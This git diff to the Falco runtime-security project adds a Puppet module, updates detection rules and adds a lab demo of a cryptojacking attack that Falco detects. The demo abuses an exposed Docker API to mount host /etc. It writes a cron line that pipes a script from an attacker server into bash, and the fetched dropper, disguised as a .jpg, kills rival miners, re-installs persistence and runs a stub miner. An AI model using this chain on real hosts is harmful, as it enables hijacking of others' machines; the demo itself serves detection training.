diff --git a/examples/bad-mount-cryptomining/README.md b/examples/bad-mount-cryptomining/README.md new file mode 100644 index 00000000..d0d8a1b5 --- /dev/null +++ b/examples/bad-mount-cryptomining/README.md @@ -0,0 +1,117 @@ +# Demo of Falco Detecting Cryptomining Exploit + +## Introduction + +Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Sysdig Falco. + +Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/). + +## Requirements + +In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl. + +## Example architecture + +The example consists of the following: + +* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host. +* `attacker-server`: A nginx instance that serves the malicious files and scripts used by the attacker. +* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information. + +All of the above are configured in the docker-compose file [demo.yml](./demo.yml). + +A separate container is created to launch the attack: + +* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. 
The JSON container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json). + +## Example Walkthrough + +### Start everything using docker-compose + +To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc. + +Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers. + +You will see fairly verbose output from dockerd: + +``` +host-machine_1 | crond: crond (busybox 1.27.2) started, log level 6 +host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1 +host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1 +host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1 +``` + +When you see log output like the following, you know that falco is started and ready: + +``` +falco_1 | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml +falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml +falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml +``` + +### Launch malicious container + +To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`). 
+ +The script `launch_malicious_container.sh` performs the necessary POSTs: + +* `http://localhost:2375/images/create?fromImage=alpine&tag=latest` +* `http://localhost:2375/containers/create?&name=docker123321-mysql` +* `http://localhost:2375/containers/docker123321-mysql/start` + +Run the script via `bash launch_malicious_container.sh`. + +### Examine cron output as malicious software is installed & run + +`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host: + +``` +* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s +``` + +It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron.update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it. + +You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. 
You should see output like the following: + +``` +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +68ed578bd034 alpine:latest "/bin/sh -c 'echo '*…" About a minute ago Up About a minute docker123321-mysql +``` + +Once the cron job runs, you will see output like the following: + +``` +host-machine_1 | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s +host-machine_1 | ***Checking for existing Miner program +attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-" +host-machine_1 | ***Killing competing Miner programs +host-machine_1 | ***Reinstalling cron job to run Miner program +host-machine_1 | ***Configuring Miner program +attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-" +attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-" +host-machine_1 | ***Configuring system for Miner program +host-machine_1 | vm.nr_hugepages = 9 +host-machine_1 | ***Running Miner program +host-machine_1 | ***Ensuring Miner program is alive +host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3 +host-machine_1 | /var/tmp +host-machine_1 | runing..... +host-machine_1 | ***Ensuring Miner program is alive +host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3 +host-machine_1 | /var/tmp +host-machine_1 | runing..... +``` + +### Observe Falco detecting malicious activity + +To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. 
Falco will detect the container launch with the sensitive mount: + +``` +falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate) +falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate) +``` + +### Cleanup + +To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`. + diff --git a/examples/bad-mount-cryptomining/attacker-nginx.conf b/examples/bad-mount-cryptomining/attacker-nginx.conf new file mode 100644 index 00000000..dbbc349f --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker-nginx.conf @@ -0,0 +1,14 @@ +server { + listen 8220; + server_name localhost; + + location / { + root /usr/share/nginx/html; + index index.html index.htm; + } + + error_page 500 502 503 504 /50x.html; + location = /50x.html { + root /usr/share/nginx/html; + } +} diff --git a/examples/bad-mount-cryptomining/attacker_files/config_1.json b/examples/bad-mount-cryptomining/attacker_files/config_1.json new file mode 100644 index 00000000..daffe428 --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker_files/config_1.json @@ -0,0 +1 @@ +{"config": "some-bitcoin-miner-config-goes-here"} diff --git a/examples/bad-mount-cryptomining/attacker_files/logo3.jpg b/examples/bad-mount-cryptomining/attacker_files/logo3.jpg new file mode 100644 index 00000000..308aa79c --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker_files/logo3.jpg @@ -0,0 +1,64 @@ +#!/bin/sh +echo "***Checking for existing Miner program" +ps -fe|grep jaav |grep -v grep +if [ $? 
-eq 0 ] +then +pwd +else + +echo "***Killing competing Miner programs" +rm -rf /var/tmp/ysjswirmrm.conf +rm -rf /var/tmp/sshd +ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9 + +echo "***Reinstalling cron job to run Miner program" +crontab -r || true && \ +echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \ +crontab /tmp/cron || true && \ +rm -rf /tmp/cron || true + +echo "***Configuring Miner program" +curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json +curl -so /var/tmp/jaav http://attacker-server:8220/minerd +chmod 777 /var/tmp/jaav +cd /var/tmp + +echo "***Configuring system for Miner program" +cd /var/tmp +proc=`grep -c ^processor /proc/cpuinfo` +cores=$(($proc+1)) +num=$(($cores*3)) +/sbin/sysctl -w vm.nr_hugepages=$num + +echo "***Running Miner program" +nohup ./jaav -c config.json -t `echo $cores` >/dev/null & +fi + +echo "***Ensuring Miner program is alive" +ps -fe|grep jaav |grep -v grep +if [ $? -eq 0 ] +then +pwd +else + +echo "***Reconfiguring Miner program" +curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json +curl -so /var/tmp/jaav http://attacker-server:8220/minerd +chmod 777 /var/tmp/jaav +cd /var/tmp + +echo "***Reconfiguring system for Miner program" +proc=`grep -c ^processor /proc/cpuinfo` +cores=$(($proc+1)) +num=$(($cores*3)) +/sbin/sysctl -w vm.nr_hugepages=$num + +echo "***Restarting Miner program" +nohup ./jaav -c config.json -t `echo $cores` >/dev/null & +fi +echo "runing....." 
diff --git a/examples/bad-mount-cryptomining/attacker_files/minerd b/examples/bad-mount-cryptomining/attacker_files/minerd new file mode 100755 index 00000000..5bfce354 --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker_files/minerd @@ -0,0 +1,8 @@ +#!/bin/bash + +while true; do + echo "Mining bitcoins..." + sleep 60 +done + + \ No newline at end of file diff --git a/examples/bad-mount-cryptomining/demo.yml b/examples/bad-mount-cryptomining/demo.yml new file mode 100644 index 00000000..05816a7c --- /dev/null +++ b/examples/bad-mount-cryptomining/demo.yml @@ -0,0 +1,41 @@ +version: '3' + +volumes: + host-filesystem: + docker-socket: + +services: + host-machine: + privileged: true + build: + context: ${PWD}/host-machine + dockerfile: ${PWD}/host-machine/Dockerfile + volumes: + - host-filesystem:/etc + - docker-socket:/var/run + ports: + - "2375:2375" + depends_on: + - "falco" + + attacker-server: + image: nginx:latest + ports: + - "8220:8220" + volumes: + - ${PWD}/attacker_files:/usr/share/nginx/html + - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf + depends_on: + - "falco" + + falco: + image: sysdig/falco:latest + privileged: true + volumes: + - docker-socket:/host/var/run + - /dev:/host/dev + - /proc:/host/proc:ro + - /boot:/host/boot:ro + - /lib/modules:/host/lib/modules:ro + - /usr:/host/usr:ro + tty: true diff --git a/examples/bad-mount-cryptomining/docker123321-mysql-container.json b/examples/bad-mount-cryptomining/docker123321-mysql-container.json new file mode 100644 index 00000000..0bbe12d8 --- /dev/null +++ b/examples/bad-mount-cryptomining/docker123321-mysql-container.json @@ -0,0 +1,7 @@ +{ + "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"], + "Image": "alpine:latest", + "HostConfig": { + "Binds": ["/etc:/mnt/etc"] + } +} diff --git a/examples/bad-mount-cryptomining/host-machine/Dockerfile 
b/examples/bad-mount-cryptomining/host-machine/Dockerfile new file mode 100644 index 00000000..ca85a7a1 --- /dev/null +++ b/examples/bad-mount-cryptomining/host-machine/Dockerfile @@ -0,0 +1,12 @@ +FROM docker:stable-dind + +RUN set -ex \ + && apk add --no-cache \ + bash curl + +COPY start-cron-and-dind.sh /usr/local/bin + +ENTRYPOINT ["start-cron-and-dind.sh"] +CMD [] + + diff --git a/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh b/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh new file mode 100755 index 00000000..6e231624 --- /dev/null +++ b/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh @@ -0,0 +1,11 @@ +#!/bin/sh + +# Start docker-in-docker, but backgrounded with its output still going +# to stdout/stderr. +dockerd-entrypoint.sh & + +# Start cron in the foreground with a moderate level of debugging to +# see job output. +crond -f -d 6 + + diff --git a/examples/bad-mount-cryptomining/launch_malicious_container.sh b/examples/bad-mount-cryptomining/launch_malicious_container.sh new file mode 100644 index 00000000..7f586b00 --- /dev/null +++ b/examples/bad-mount-cryptomining/launch_malicious_container.sh @@ -0,0 +1,14 @@ +#!/bin/sh + +echo "Pulling alpine:latest image to docker-in-docker instance" +curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest' + +echo "Creating container mounting /etc from host-machine" +curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql' + +echo "Running container mounting /etc from host-machine" +curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start' + + + + diff --git a/examples/puppet-module/README.md b/examples/puppet-module/README.md new file mode 100644 index 00000000..d088b09a --- /dev/null +++ b/examples/puppet-module/README.md @@ -0,0 +1,3 @@ +# Example Puppet Falco Module + +This contains 
an example [Puppet](https://puppet.com/) module for Falco. diff --git a/examples/puppet-module/sysdig-falco/Gemfile b/examples/puppet-module/sysdig-falco/Gemfile new file mode 100644 index 00000000..7bd34cda --- /dev/null +++ b/examples/puppet-module/sysdig-falco/Gemfile @@ -0,0 +1,7 @@ +source 'https://rubygems.org' + +puppetversion = ENV.key?('PUPPET_VERSION') ? "= #{ENV['PUPPET_VERSION']}" : ['>= 3.3'] +gem 'puppet', puppetversion +gem 'puppetlabs_spec_helper', '>= 0.1.0' +gem 'puppet-lint', '>= 0.3.2' +gem 'facter', '>= 1.7.0' diff --git a/examples/puppet-module/sysdig-falco/README.md b/examples/puppet-module/sysdig-falco/README.md new file mode 100644 index 00000000..8e8f89ea --- /dev/null +++ b/examples/puppet-module/sysdig-falco/README.md @@ -0,0 +1,241 @@ +# falco + +#### Table of Contents + +1. [Overview](#overview) +2. [Module Description - What the module does and why it is useful](#module-description) +3. [Setup - The basics of getting started with falco](#setup) + * [What falco affects](#what-falco-affects) + * [Beginning with falco](#beginning-with-falco) +4. [Usage - Configuration options and additional functionality](#usage) +5. [Reference - An under-the-hood peek at what the module is doing and how](#reference) +5. [Limitations - OS compatibility, etc.](#limitations) +6. [Development - Guide for contributing to the module](#development) + +## Overview + +Sysdig Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Powered by sysdig’s system call capture infrastructure, falco lets you continuously monitor and detect container, application, host, and network activity... all in one place, from one source of data, with one set of rules. + +#### What kind of behaviors can Falco detect? + +Falco can detect and alert on any behavior that involves making Linux system calls. 
Thanks to Sysdig's core decoding and state tracking functionality, falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process. For example, you can easily detect things like: + +- A shell is run inside a container +- A container is running in privileged mode, or is mounting a sensitive path like `/proc` from the host. +- A server process spawns a child process of an unexpected type +- Unexpected read of a sensitive file (like `/etc/shadow`) +- A non-device file is written to `/dev` +- A standard system binary (like `ls`) makes an outbound network connection + +## Module Description + +This module configures falco as a systemd service. You configure falco +to send its notifications to one or more output channels (syslog, +files, programs). + +## Setup + +### What falco affects + +This module affects the following: + +* The main falco configuration file `/etc/falco/falco.yaml`, including +** Output format (JSON vs plain text) +** Log level +** Rule priority level to run +** Output buffering +** Output throttling +** Output channels (syslog, file, program) + +### Beginning with falco + +To have Puppet install falco with the default parameters, declare the falco class: + +``` puppet +class { 'falco': } +``` + +When you declare this class with the default options, the module: + +* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system. +* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled. +* Starts the falco service. 
+ +## Usage + +### Enabling file output + +To enable file output, set the `file_output` hash, as follows: + +``` puppet +class { 'falco': + file_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'filename' => '/tmp/falco-events.txt' + }, +} +``` + +### Enabling program output + +To enable program output, set the `program_output` hash and optionally the `json_output` parameters, as follows: + +``` puppet +class { 'falco': + json_output => 'true', + program_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'program' => 'curl http://some-webhook.com' + }, +} +``` + +## Reference + +* [**Public classes**](#public-classes) + * [Class: falco](#class-falco) + +### Public Classes + +#### Class: `falco` + +Guides the basic setup and installation of falco on your system. + +When this class is declared with the default options, Puppet: + +* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system. +* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled. +* Starts the falco service. + +You can simply declare the default `falco` class: + +``` puppet +class { 'falco': } +``` + +###### `rules_file` + +An array of files for falco to load. Order matters--the first file listed will be loaded first. + +Default: `['/etc/falco/falco_rules.yaml', '/etc/falco/falco_rules.local.yaml']` + +##### `json_output` + +Whether to output events in json or text. + +Default: `false` + +##### `log_stderr` + +Send falco's logs to stderr. Note: this is not notifications, this is +logs from the falco daemon itself. + +Default: `false` + +##### `log_syslog` + +Send falco's logs to syslog. Note: this is not notifications, this is +logs from the falco daemon itself. + +Default: `true` + +##### `log_level` + +Minimum log level to include in logs. Note: these levels are +separate from the priority field of rules. 
This refers only to the +log level of falco's internal logging. Can be one of "emergency", +"alert", "critical", "error", "warning", "notice", "info", "debug". + +Default: `info` + +##### `priority` + +Minimum rule priority level to load and run. All rules having a +priority more severe than this level will be loaded/run. Can be one +of "emergency", "alert", "critical", "error", "warning", "notice", +"info", "debug". + +Default: `debug` + +##### `buffered_outputs` + +Whether or not output to any of the output channels below is +buffered. + +Default: `true` + +##### `outputs_rate`/`outputs_max_burst` + +A throttling mechanism implemented as a token bucket limits the +rate of falco notifications. This throttling is controlled by the following configuration +options: + +* `outputs_rate`: the number of tokens (i.e. right to send a notification) + gained per second. Defaults to 1. +* `outputs_max_burst`: the maximum number of tokens outstanding. Defaults to 1000. + +##### `syslog_output` + +Controls syslog output for notifications. Value: a hash, containing the following: + +* `enabled`: `true` or `false`. Default: `true`. + +Example: + +``` puppet +class { 'falco': + syslog_output => { + 'enabled' => 'true', + }, +} +``` + +##### `file_output` + +Controls file output for notifications. Value: a hash, containing the following: + +* `enabled`: `true` or `false`. Default: `false`. +* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`. +* `filename`: Notifications will be written to this file. + +Example: + +``` puppet +class { 'falco': + file_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'filename' => '/tmp/falco-events.txt' + }, +} +``` + +##### `program_output` + +Controls program output for notifications. 
Value: a hash, containing the following: + +* `enabled`: `true` or `false`. Default: `false`. +* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`. +* `program`: Notifications will be written to this program. + +Example: + +``` puppet +class { 'falco': + program_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'program' => 'curl http://some-webhook.com' + }, +} +``` + +## Limitations + +The module works where falco works as a daemonized service (generally, Linux only). + +## Development + +For more information on Sysdig Falco, visit our [github](https://github.com/draios/falco) or [web site](https://sysdig.com/opensource/falco/). diff --git a/examples/puppet-module/sysdig-falco/Rakefile b/examples/puppet-module/sysdig-falco/Rakefile new file mode 100644 index 00000000..d1e11f79 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/Rakefile @@ -0,0 +1,18 @@ +require 'rubygems' +require 'puppetlabs_spec_helper/rake_tasks' +require 'puppet-lint/tasks/puppet-lint' +PuppetLint.configuration.send('disable_80chars') +PuppetLint.configuration.ignore_paths = ["spec/**/*.pp", "pkg/**/*.pp"] + +desc "Validate manifests, templates, and ruby files" +task :validate do + Dir['manifests/**/*.pp'].each do |manifest| + sh "puppet parser validate --noop #{manifest}" + end + Dir['spec/**/*.rb','lib/**/*.rb'].each do |ruby_file| + sh "ruby -c #{ruby_file}" unless ruby_file =~ /spec\/fixtures/ + end + Dir['templates/**/*.erb'].each do |template| + sh "erb -P -x -T '-' #{template} | ruby -c" + end +end diff --git a/examples/puppet-module/sysdig-falco/manifests/config.pp b/examples/puppet-module/sysdig-falco/manifests/config.pp new file mode 100644 index 00000000..68ccd594 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/config.pp @@ -0,0 +1,13 @@ +# == Class: 
falco::config +class falco::config inherits falco { + + file { '/etc/falco/falco.yaml': + notify => Service['falco'], + ensure => file, + owner => 'root', + group => 'root', + mode => '0644', + content => template('falco/falco.yaml.erb'), + } + +} \ No newline at end of file diff --git a/examples/puppet-module/sysdig-falco/manifests/init.pp b/examples/puppet-module/sysdig-falco/manifests/init.pp new file mode 100644 index 00000000..1e944b1e --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/init.pp @@ -0,0 +1,31 @@ +class falco ( + $rules_file = [ + '/etc/falco/falco_rules.yaml', + '/etc/falco/falco_rules.local.yaml' + ], + $json_output = 'false', + $log_stderr = 'false', + $log_syslog = 'true', + $log_level = 'info', + $priority = 'debug', + $buffered_outputs = 'true', + $outputs_rate = 1, + $outputs_max_burst = 1000, + $syslog_output = { + 'enabled' => 'true' + }, + $file_output = { + 'enabled' => 'false', + 'keep_alive' => 'false', + 'filename' => '/tmp/falco_events.txt' + }, + $program_output = { + 'enabled' => 'false', + 'keep_alive' => 'false', + 'program' => 'curl http://some-webhook.com' + }, + ) { + include falco::install + include falco::config + include falco::service +} diff --git a/examples/puppet-module/sysdig-falco/manifests/install.pp b/examples/puppet-module/sysdig-falco/manifests/install.pp new file mode 100644 index 00000000..a057559d --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/install.pp @@ -0,0 +1,6 @@ +# == Class: falco::install +class falco::install inherits falco { + package { 'falco': + ensure => installed, + } +} \ No newline at end of file diff --git a/examples/puppet-module/sysdig-falco/manifests/service.pp b/examples/puppet-module/sysdig-falco/manifests/service.pp new file mode 100644 index 00000000..0d3c21e8 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/service.pp @@ -0,0 +1,11 @@ +# == Class: falco::service +class falco::service inherits falco { + + service { 'falco': + ensure 
=> running, + enable => true, + hasstatus => true, + hasrestart => true, + require => Package['falco'], + } +} diff --git a/examples/puppet-module/sysdig-falco/metadata.json b/examples/puppet-module/sysdig-falco/metadata.json new file mode 100644 index 00000000..b3ffecd8 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/metadata.json @@ -0,0 +1,14 @@ +{ + "name": "sysdig-falco", + "version": "0.1.0", + "author": "sysdig", + "summary": "Sysdig Falco: Behavioral Activity Monitoring With Container Support", + "license": "GPLv2", + "source": "https://github.com/draios/falco", + "project_page": "https://github.com/draios/falco", + "issues_url": "https://github.com/draios/falco/issues", + "dependencies": [ + {"name":"puppetlabs-stdlib","version_requirement":">= 1.0.0"} + ] +} + diff --git a/examples/puppet-module/sysdig-falco/spec/classes/init_spec.rb b/examples/puppet-module/sysdig-falco/spec/classes/init_spec.rb new file mode 100644 index 00000000..05f94ad1 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/spec/classes/init_spec.rb @@ -0,0 +1,7 @@ +require 'spec_helper' +describe 'falco' do + + context 'with defaults for all parameters' do + it { should contain_class('falco') } + end +end diff --git a/examples/puppet-module/sysdig-falco/spec/spec_helper.rb b/examples/puppet-module/sysdig-falco/spec/spec_helper.rb new file mode 100644 index 00000000..2c6f5664 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/spec/spec_helper.rb @@ -0,0 +1 @@ +require 'puppetlabs_spec_helper/module_spec_helper' diff --git a/examples/puppet-module/sysdig-falco/templates/falco.yaml.erb b/examples/puppet-module/sysdig-falco/templates/falco.yaml.erb new file mode 100644 index 00000000..17fbb423 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/templates/falco.yaml.erb @@ -0,0 +1,96 @@ +#### +# THIS FILE MANAGED BY PUPPET. DO NOT MODIFY +#### + +# File(s) containing Falco rules, loaded at startup. 
+# +# falco_rules.yaml ships with the falco package and is overridden with +# every new software version. falco_rules.local.yaml is only created +# if it doesn't exist. If you want to customize the set of rules, add +# your customizations to falco_rules.local.yaml. +# +# The files will be read in the order presented here, so make sure if +# you have overrides they appear in later files. +rules_file: +<% Array(@rules_file).each do |file| -%> + - <%= file %> +<% end -%> + +# Whether to output events in json or text +json_output: <%= @json_output %> + +# Send information logs to stderr and/or syslog Note these are *not* security +# notification logs! These are just Falco lifecycle (and possibly error) logs. +log_stderr: <%= @log_stderr %> +log_syslog: <%= @log_syslog %> + +# Minimum log level to include in logs. Note: these levels are +# separate from the priority field of rules. This refers only to the +# log level of falco's internal logging. Can be one of "emergency", +# "alert", "critical", "error", "warning", "notice", "info", "debug". +log_level: <%= @log_level %> + +# Minimum rule priority level to load and run. All rules having a +# priority more severe than this level will be loaded/run. Can be one +# of "emergency", "alert", "critical", "error", "warning", "notice", +# "info", "debug". +priority: <%= @priority %> + +# Whether or not output to any of the output channels below is +# buffered. Defaults to true +buffered_outputs: <%= @buffered_outputs %> + +# A throttling mechanism implemented as a token bucket limits the +# rate of falco notifications. This throttling is controlled by the following configuration +# options: +# - rate: the number of tokens (i.e. right to send a notification) +# gained per second. Defaults to 1. +# - max_burst: the maximum number of tokens outstanding. Defaults to 1000. +# +# With these defaults, falco could send up to 1000 notifications after +# an initial quiet period, and then up to 1 notification per second +# afterward. 
It would gain the full burst back after 1000 seconds of +# no activity. + +outputs: + rate: <%= @outputs_rate %> + max_burst: <%= @outputs_max_burst %> + +# Where security notifications should go. +# Multiple outputs can be enabled. +<% unless @syslog_output.nil? -%> +syslog_output: + enabled: <%= @syslog_output['enabled'] %> +<% end -%> + +# If keep_alive is set to true, the file will be opened once and +# continuously written to, with each output message on its own +# line. If keep_alive is set to false, the file will be re-opened +# for each output message. +<% unless @file_output.nil? -%> +file_output: + enabled: <%= @file_output['enabled'] %> + keep_alive: <%= @file_output['keep_alive'] %> + filename: <%= @file_output['filename'] %> +<% end -%> + +# Possible additional things you might want to do with program output: +# - send to a slack webhook: +# program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX" +# - logging (alternate method than syslog): +# program: logger -t falco-test +# - send over a network connection: +# program: nc host.example.com 80 + +# If keep_alive is set to true, the program will be started once and +# continuously written to, with each output message on its own +# line. If keep_alive is set to false, the program will be re-spawned +# for each output message. + +<% unless @program_output.nil? -%> +program_output: + enabled: <%= @program_output['enabled'] %> + keep_alive: <%= @program_output['keep_alive'] %> + program: <%= @program_output['program'] %> +<% end -%> + diff --git a/examples/puppet-module/sysdig-falco/tests/init.pp b/examples/puppet-module/sysdig-falco/tests/init.pp new file mode 100644 index 00000000..8e70cc66 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/tests/init.pp @@ -0,0 +1,12 @@ +# The baseline for module testing used by Puppet Labs is that each manifest +# should have a corresponding test manifest that declares that class or defined +# type. 
+# +# Tests are then run by using puppet apply --noop (to check for compilation +# errors and view a log of events) or by fully applying the test in a virtual +# environment (to compare the resulting system state to the desired state). +# +# Learn more about module testing here: +# http://docs.puppetlabs.com/guides/tests_smoke.html +# +include falco diff --git a/falco.yaml b/falco.yaml index a2bef48b..78c1355f 100644 --- a/falco.yaml +++ b/falco.yaml @@ -14,6 +14,11 @@ rules_file: # Whether to output events in json or text json_output: false +# When using json output, whether or not to include the "output" property +# itself (e.g. "File below a known binary directory opened for writing +# (user=root ....") in the json output. +json_include_output_property: true + # Send information logs to stderr and/or syslog Note these are *not* security # notification logs! These are just Falco lifecycle (and possibly error) logs. log_stderr: true diff --git a/rules/falco_rules.yaml b/rules/falco_rules.yaml index abfa5802..c9e0e18f 100644 --- a/rules/falco_rules.yaml +++ b/rules/falco_rules.yaml @@ -148,7 +148,8 @@ # interpreted by the filter expression. - list: rpm_binaries items: [dnf, rpm, rpmkey, yum, '"75-system-updat"', rhsmcertd-worke, subscription-ma, - repoquery, rpmkeys, rpmq, yum-cron, yum-config-mana, yum-debug-dump] + repoquery, rpmkeys, rpmq, yum-cron, yum-config-mana, yum-debug-dump, + abrt-action-sav, rpmdb_stat] - macro: rpm_procs condition: proc.name in (rpm_binaries) or proc.name in (salt-minion) @@ -408,6 +409,16 @@ condition: ((proc.pname=sh and proc.aname[2]=yum) or (proc.aname[2]=sh and proc.aname[3]=yum)) +- macro: run_by_ms_oms + condition: > + (proc.aname[3] startswith omsagent- or + proc.aname[3] startswith scx-) + +- macro: run_by_google_accounts_daemon + condition: > + (proc.aname[1] startswith google_accounts or + proc.aname[2] startswith google_accounts) + # Chef is similar. 
- macro: run_by_chef condition: (proc.aname[2]=chef_command_wr or proc.aname[3]=chef_command_wr or @@ -420,6 +431,9 @@ - macro: run_by_centrify condition: (proc.aname[2]=centrify or proc.aname[3]=centrify or proc.aname[4]=centrify) +- macro: run_by_puppet + condition: (proc.aname[2]=puppet or proc.aname[3]=puppet) + # Also handles running semi-indirectly via scl - macro: run_by_foreman condition: > @@ -464,20 +478,34 @@ - macro: perl_running_updmap condition: (proc.cmdline startswith "perl /usr/bin/updmap") +- macro: perl_running_centrifydc + condition: (proc.cmdline startswith "perl /usr/share/centrifydc") + - macro: parent_ucf_writing_conf condition: (proc.pname=ucf and proc.aname[2]=frontend) - macro: consul_template_writing_conf - condition: (proc.name=consul-template and fd.name startswith /etc/haproxy) + condition: > + ((proc.name=consul-template and fd.name startswith /etc/haproxy) or + (proc.name=reload.sh and proc.aname[2]=consul-template and fd.name startswith /etc/ssl)) - macro: countly_writing_nginx_conf condition: (proc.cmdline startswith "nodejs /opt/countly/bin" and fd.name startswith /etc/nginx) -- macro: omiagent_writing_conf - condition: (proc.name in (omiagent,PerformInventor) and fd.name startswith /etc/opt/omi/conf/) +- macro: ms_oms_writing_conf + condition: > + ((proc.name in (omiagent,omsagent,in_heartbeat_r*,omsadmin.sh,PerformInventor) + or proc.pname in (omi.postinst,omsconfig.posti,scx.postinst,omsadmin.sh,omiagent)) 